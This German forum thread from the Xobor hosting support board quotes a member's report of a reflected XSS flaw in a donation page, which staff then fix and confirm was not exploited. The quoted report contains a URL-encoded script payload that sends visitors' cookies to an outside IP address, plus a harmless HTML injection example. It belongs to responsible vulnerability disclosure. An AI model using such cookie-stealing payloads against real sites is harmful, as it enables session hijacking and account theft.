[behoben] Gefahr durch reflected XSS Attack ?

24.05.2019 06:43
#1 [behoben] Gefahr durch reflected XSS Attack ?
avatar
Mitglied

@Johannes
@Ingmar
@Sami

Ich habe eine beunruhigende Nachricht eines Mitglieds bekommen in dem er schrieb er könne das Forum hacken.

Zitat:
Hallo Scannerxy,


Ich habe ein sogenannten reflected XSS Attack gefunden. Damit kann ich valides Javascript auf deiner Webseite ausführen und sogesehen alles mögliche anstellen.
Damit ist es auch möglich die Anmeldedaten von Usern zu klauen durch Cookie stealing.

Ich seh, dass du eine recht große Community aufgebaut hast und wollte dir das schnellstmöglich mitteilen.

Hier sind paar Beispiele, damit du das mal selber sehen kannst (ich schreibe nur Text auf die Seite und einfaches javascript)

1) payedabo_forum.php?donate=1&paykey=AP-8EL15736YC445134N&amount=%3Ch1%3EHALLO%20SCANNERXY%20:)%20Das%20ist%20ein%20simpler%20html%20reflected%20XSS%20Attack%20%3C/h1%3E

2) Einfaches Javascript (funktioniert nur im firefox angemeldet, da chrome einen xss auditor hat; den kann man aber umgehen wenn man sich etwas mühe gibt)
payedabo_forum.php?donate=1&paykey=AP-8EL15736YC445134N&amount=%3Cscript%3Edocument.location%3D%22http:%2F%2F109.73.52.223%2F%3Fck%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E

Zitat Ende.

Was ist davon zu halten? Droht dadurch tatsächlich Gefahr? Es wäre nett wenn ihr dazu Stellung nehmen würdet.

Themen:

 Antworten

 Beitrag melden
24.05.2019 08:22
#2 RE: Gefahr durch reflected XSS Attack ?
avatar
Administrator

So etwas bitte in Zukunft immer direkt an forum@miranus.com melden.
Hinweise zu Sicherheitslücken gehören nicht in den öffentlichen Bereich, damit wir Zeit haben diese zu beheben.

Oben genannter Fehler wurde soeben behoben.

Ich habe in den Logs geschaut: Der Fehler wurde auch nicht ausgenutzt.

Mit freundlichen Grüßen,
Joh. Voß


xobor.de · Miranus GmbH · Wir helfen gerne - Unterstützen Sie Xobor durch die Buchung eines Premium Tarifs.

 Antworten

 Beitrag melden
24.05.2019 12:20
#3 RE: Gefahr durch reflected XSS Attack ?
avatar
Mitglied

Vielen Dank für das beheben der Sicherheitslücke.

Ich habe gerade weiteres per Kontaktformular an euch gesendet.

Themen:

 Antworten

 Beitrag melden
24.05.2019 15:48 (zuletzt bearbeitet: 24.05.2019 15:52)
#4 RE: Gefahr durch reflected XSS Attack ?
avatar
Mitglied

@Scannerxy
Danke für die Meldung. Da war ich wohl bei deinem Forum mit dem Report der Sicherheitslücke falsch.

@Johannes
Ich würde gerne wegen dem Fund Kontakt mit euch aufnehmen und habe euch per Kontaktformular angeschrieben.
Wollte Sicherstellen, ob diese ankam.


 Antworten

 Beitrag melden
24.05.2019 16:23
avatar  Sami
#5 RE: Gefahr durch reflected XSS Attack ?
avatar
Xobor

Hallo @Thomasx00f,

vielen Dank für deine Mühe. Ich kann bestätigen, dass die E-Mail bei uns ankam, unsere Technik wird es sich schnellstmöglich genauer ansehen.

Schöne Grüße,
Sami

Support · Xobor.de · Miranus GmbH · Wir helfen gerne - Unterstütze Xobor durch die Buchung eines Premium Tarifs.

 Antworten

 Beitrag melden
Bereits Mitglied?
Jetzt anmelden!
Mitglied werden?
Jetzt registrieren!